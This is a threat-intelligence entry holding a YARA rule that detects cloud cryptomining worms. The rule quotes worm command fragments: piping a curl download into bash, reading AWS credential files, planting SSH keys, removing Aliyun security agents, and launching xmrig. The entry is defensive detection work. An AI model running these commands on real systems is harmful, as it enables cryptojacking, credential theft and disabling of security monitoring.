Common Information
| Type | Value |
|---|---|
| Value |
rule cloud_mining_worm {
meta:
description = "Detects Common Cloud Mining Worms"
author = " [email protected] "
date = "2020-08-16"
license = "Apache License 2.0"
hash1 = "3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f"
hash2 = "929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b"
hash3 = "705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0"
strings:
$a = "echo $LOCKFILE | base64 -d > $tmpxmrigfile" ascii wide
$b = "/root/.tmp/xmrig config=/root/.tmp/" ascii wide
$c = "if [ -s /usr/bin/curl ]; then" ascii wide
$d = "echo found: /root/.aws/credentials'" ascii wide
$e = "function KILLMININGSERVICES(){" ascii wide
$g = "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null" ascii wide
$h = "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service" ascii wide
$i = " [email protected] /root/.ssh/id_ed25519.pub" ascii wide
$j = "echo '0' >/proc/sys/kernel/nmi_watchdog" ascii wide
$k = "curl http://update.aegis.aliyun.com/download/uninstall.sh | bash" ascii wide
$l = "rm -f /var/tmp/kinsing" ascii wide
condition:
filesize < 500KB and any of them
}
|
| Category | |
| Type | Yara Rule |
| Misp Type | |
| Description |